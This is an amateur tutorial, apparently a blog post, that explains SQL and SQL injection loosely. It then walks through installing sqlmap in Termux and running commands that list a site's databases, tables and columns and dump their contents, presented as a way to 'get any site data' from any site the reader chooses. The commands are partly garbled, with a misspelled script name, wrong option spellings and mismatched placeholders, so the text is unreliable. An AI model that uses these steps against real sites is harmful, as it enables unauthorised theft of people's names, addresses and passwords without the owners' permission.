SQL Map SQL vulnerabilities

SQL Map/vulnerabilities
•What is SQL 
--> The SQL is Structured Query Language The SQL is like database in simple word. It means the all data store in sql database. Like your address, name, password, and etc. More.Its look like spreadsheet ok.! You know the spreadsheet if  you use the Microsoft Excel already and created like thats image is down below
All data store like that ok 

Some images gone by some copyrighted©

•what SQL vulnerablity
--> The SQL vulnerability is very danger vulnerability because all site i mean the site are base on php or the sites on php server this site have sql database how the sql db. Get vulnerable when the website query are not in website so if we insert the query is not in website so website shows sql error this thing is sql vulnerablity

•How to check sql error
--> For checking sqlberror in php websites so use this tools
2. SQL scan
Other online website scanners

• can i check sql error with termux
--> Yes you can

•How to use Sql map to get any site data
1. Install in SQL Map Termux with STARK 2.0 Lazymux

2. Install the requirementsbin Termux ⤵️
 pkg install php
 pkg install python2

3. Scan the site you want if you get vulnerability use redhawk or sqlscan 

4. Go to sqlmap
Command ⤵️
•If you want go to the database 
↪️python2 sqlmap.py -u (YOUR URL) --dbs

•If you found the database
↪️python2 sqlmap.py -u (YOUR URL) -D (TABLE) --tables

•If you found the tables then go to columns
↪️python2 sqlmap.py -u (YOUR URL) -D (TABLES) -T (COLUMNS) --colums

• If you found the columns you want to download them so then
↪️python2 sqlmal.py -u (YOUR URL) -D (TABLE) -T (COLUMNS) -C --dump


•Youtube video

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